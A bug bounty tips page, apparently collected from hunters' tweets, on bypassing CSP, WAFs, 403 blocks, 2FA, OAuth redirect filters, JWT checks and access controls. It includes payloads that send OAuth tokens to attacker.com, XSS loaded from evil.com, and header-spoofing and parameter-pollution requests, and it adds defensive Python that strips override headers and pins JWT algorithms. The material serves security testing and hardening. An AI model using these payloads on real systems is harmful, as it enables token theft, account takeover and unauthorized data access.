Book of BugBounty Tips

Bypasses


Last updated 1 month ago

  • CSP Bypass, script-src 'self' data: -

  • Cloudfront Bypass -

  • 403 Bypass: Tools - https://github.com/lobuhi/byp4xx , https://github.com/Raywando/4xxbypass , https://github.com/sting8k/BurpSuite_403Bypasser

  • Price Manipulation -

  • OTP bypass -

  • CSP -

  • I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips The last /setup/ endpoint was as the attacker while the first one was as the victim. https://twitter.com/HackerHumble

  • Sometimes you find those paths that forward to a login page and you can't see the content inside them (ex: /path/to/secret --> Google login).
If the "origin" header doesn't work, try "x-[org name]-origin"; the same thing applies to all headers!! e.g. x-uber-origin, x-uber-host, etc.
#bugbounty I was able to bypass the filter on OAuth through fuzzing with URL-encoded chars. Found that the website adds / before %5b when redirecting the token. Example: target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect token to: http://Attacker.com/%5b.target.comrget.com?token=…...
Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.
What worked was... \udfff -> � -> ?
Therefore... {"redirectUri":"https://attacker\udfff@[victim]/"}
Equals... Location: https://attacker?@[victim]/
JWT Token Bypasses #2:
Capture the JWT token.
If the algorithm is RS256, change it to HS256 and sign the token with the public key (which you can get by visiting the JWKS URI; mostly it will be the public key from the site's HTTPS certificate) (1/2)
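As an added example (not from the page or any of the quoted hunters), the server-side check that closes the RS256-to-HS256 confusion above: the verifier pins the algorithm from its own configuration instead of reading it from the token header. It is pure standard library, so the RS256 branch is a stub and PUBLIC_KEY_PEM is a constructed placeholder, not a real key.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed placeholder standing in for the server's RSA public key (the real one
# is public by design: JWKS URI or the site's TLS certificate, as the tip notes).
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256_token(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token over 'payload' with 'secret' as the HMAC key."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"

def _hmac_ok(header: str, body: str, sig: str, key: bytes) -> bool:
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))

def verify_trusting_header(token: str, key: bytes) -> Optional[dict]:
    """Vulnerable: the token's own header picks the algorithm, so the RSA public
    key bytes get reused as an HMAC secret whenever alg says HS256."""
    header, body, sig = token.split(".")
    alg = json.loads(_b64url_decode(header)).get("alg")
    if alg == "HS256" and _hmac_ok(header, body, sig, key):
        return json.loads(_b64url_decode(body))
    return None  # RS256 branch (real RSA verification) omitted: stdlib has no RSA

def verify_pinned(token: str, key: bytes, expected_alg: str = "RS256") -> Optional[dict]:
    """Hardened: server configuration fixes the algorithm; a token claiming
    anything else is rejected before any key material is touched."""
    header, body, sig = token.split(".")
    if json.loads(_b64url_decode(header)).get("alg") != expected_alg:
        return None
    if expected_alg == "HS256" and _hmac_ok(header, body, sig, key):
        return json.loads(_b64url_decode(body))
    return None  # RS256 verification would go here, with an RSA library
```

Real libraries expose the same fix as an explicit algorithms allow-list on the decode call; the point is that the allow-list comes from the server, never from the token.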
Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header.
POST /admin/deleteUser HTTP/1.1 -> 403
POST / HTTP/1.1
X-Original-URL: /admin/deleteUser -> 200 OK
Bypass Success! #bugbounty #bugbountytip
{"id":111} --> 401 Unauthorized
{"id":{"id":111}} --> 200 OK
POST /api/get_profile Content-Type: application/json {"user_id":,"user_id":}
GET /api_v1/messages?user_id=VICTIM_ID --> 401
GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK
How to find authentication bypass vulnerabilities. Focus: I added headers.
Request: GET /delete?user=test HTTP/1.1
Response: HTTP/1.1 401 Unauthorized
Request: GET /delete?user=test HTTP/1.1 with X-Custom-IP-Authorization: 127.0.0.1
Response: HTTP/1.1 302 Found
So: Site allows external '.css' stylesheets? Inject your XSS in your local 'style.css' and call it from external: "<svg><link href=//evil.com/style.css>". The XSS will be injected in the HTML! (CSP is on? but no style-src?) So hit the box dude! #bugbounty #infosec
CSP - Hate CSP? Me too. I found HTML Injection in a Bugcrowd private program (can't trigger script because of CSP). Staff changed the state to P5 (Content Spoofing). But I could raise it again to P3 (Iframe Injection) and it was Triaged.
<iframe src= is blocked by CSP.
Solution: <iframe srcdoc=
Auth bypass tip:
/api/ -> 403. Fuzzing -> not working. Try: /api/application.wadl?detail=true
Found:
/api/etc/projects/{id}
/api/etc/users/{id}
/api/etc/admin/
Impact:
[ + ] PII info disclosure
[ + ] Sensitive info leak
[ + ] Access admin endpoint
#bugbantytips #bugbountytips
1. Found a subdomain with a 404 error.
2. Added /api ==> 401 error.
3. Using FFUF, found the /api/v2/users endpoint. But still forbidden.
4. Bypassed the API protection using / ===> //api/v2/users. Boom!! PII of an internal user disclosed. #bugbounty #cybersecurity #infosec #bugbountytips
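Several of the tips above share one root cause: the authorization decision is made on something the client controls (X-Original-URL, X-Custom-IP-Authorization, an x-[org]-origin variant) or on a raw path such as //api/v2/users that the backend later normalises. The following is an added example, not code from the page or any quoted hunter, of what the first trusted hop should do: drop those headers (a proxy then sets its own X-Forwarded-For) and authorise on the canonical path. The header names and protected prefixes are taken from the tips; everything else is assumed.

```python
import posixpath
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Client-supplied headers that some frameworks or WAF rules consult for routing
# or trust decisions; none of them should survive the first trusted hop.
OVERRIDE_HEADERS = {
    "x-original-url", "x-rewrite-url", "x-custom-ip-authorization",
    "x-forwarded-for", "x-real-ip", "x-originating-ip", "x-remote-addr",
}
# Org-flavoured variants of the same idea (x-uber-origin, x-uber-host, ...).
ORG_VARIANT = re.compile(r"^x-[a-z0-9]+-(origin|host|url|ip|forwarded-for)$")
# Prefixes taken from the tips above; a real deployment loads these from config.
PROTECTED_PREFIXES = ("/admin/", "/api/v2/users", "/api/etc/")

def canonical_path(raw_path: str) -> str:
    """Decode once, then collapse '//', '.' and '..' so '//api/v2/users' and
    '/api/x/../v2/users' are authorised as the resource the backend serves."""
    path = unquote(raw_path.split("?", 1)[0])
    # posixpath keeps a leading '//' (POSIX allows it); strip it before normpath.
    canonical = posixpath.normpath("/" + path.lstrip("/"))
    if path.endswith("/") and not canonical.endswith("/"):
        canonical += "/"
    return canonical

def strip_override_headers(headers: Dict[str, str]) -> Tuple[Dict[str, str], List[str]]:
    """Return (headers to forward, names dropped); log the dropped names."""
    kept, dropped = {}, []
    for name, value in headers.items():
        lname = name.lower()
        if lname in OVERRIDE_HEADERS or ORG_VARIANT.match(lname):
            dropped.append(name)
        else:
            kept[name] = value
    return kept, dropped

def needs_auth(raw_path: str) -> bool:
    """Authorise on the canonical path only, never on a header or the raw string."""
    return canonical_path(raw_path).startswith(PROTECTED_PREFIXES)
```

A request whose dropped list is non-empty is worth alerting on: legitimate clients have no reason to send X-Original-URL or a custom IP authorization header.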
It's possible to bypass #CSP with the following:
#JSONP: <script src="https://trustedsite/jsonp?callback=payload">
#AngularJS: <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
Encountered with AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1) #BugBounty #bugbountytip #bugbountytips
If the target is using @Cloudflare, dig in their DNS records and search for the origin's IP address. If you attack the application directly by its IP, Cloudflare's WAF will not be there.
Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.
Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip
Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
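The nested-object, duplicate-key, parameter-pollution and 0.9 tricks above all exploit a handler that accepts any shape and coerces it later. As an added example (not from the page or the quoted hunters), a strict extractor for a user_id that refuses those shapes up front; the parameter name user_id and the BadRequest class are assumptions.

```python
import json
from typing import Any, Callable
from urllib.parse import parse_qs

class BadRequest(ValueError):
    """Raised for any shape the handler did not explicitly expect."""

def _reject_duplicate_keys(pairs):
    # json.loads would silently keep the last value; refuse the document instead.
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise BadRequest(f"duplicate JSON key {key!r}")
        seen[key] = value
    return seen

def strict_int(value: Any) -> int:
    """Accept only a JSON integer or an ASCII digit string; 0.9, "1.0", true
    and nested objects are refused instead of being rounded or unwrapped."""
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise BadRequest(f"not an integer: {value!r}")
    if isinstance(value, str):
        if not (value.isascii() and value.isdigit()):
            raise BadRequest(f"not an integer: {value!r}")
        value = int(value)
    return value

def user_id_from_json(body: str) -> int:
    data = json.loads(body, object_pairs_hook=_reject_duplicate_keys)
    if not isinstance(data, dict) or "user_id" not in data:
        raise BadRequest("user_id missing")
    return strict_int(data["user_id"])

def user_id_from_query(query: str) -> int:
    # parse_qs keeps every occurrence; more than one is parameter pollution.
    values = parse_qs(query, keep_blank_values=True).get("user_id", [])
    if len(values) != 1:
        raise BadRequest(f"user_id must appear exactly once, got {len(values)}")
    return strict_int(values[0])

def rejected(parser: Callable[[str], int], raw: str) -> bool:
    """True when 'parser' refuses 'raw' (handy for checks)."""
    try:
        parser(raw)
    except BadRequest:
        return True
    return False
```

The same strict_int must also be the value that reaches the database query, so that the check and the lookup cannot disagree about what the ID is.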
When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.
https://twitter.com/404death/status/1191222237782659072
Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter
https://twitter.com/RathiArpeet/status/1315593774773334016
https://twitter.com/hackerscrolls/status/1254701239360720900
https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20
https://twitter.com/iam_j0ker/status/1303658167205728256?s=20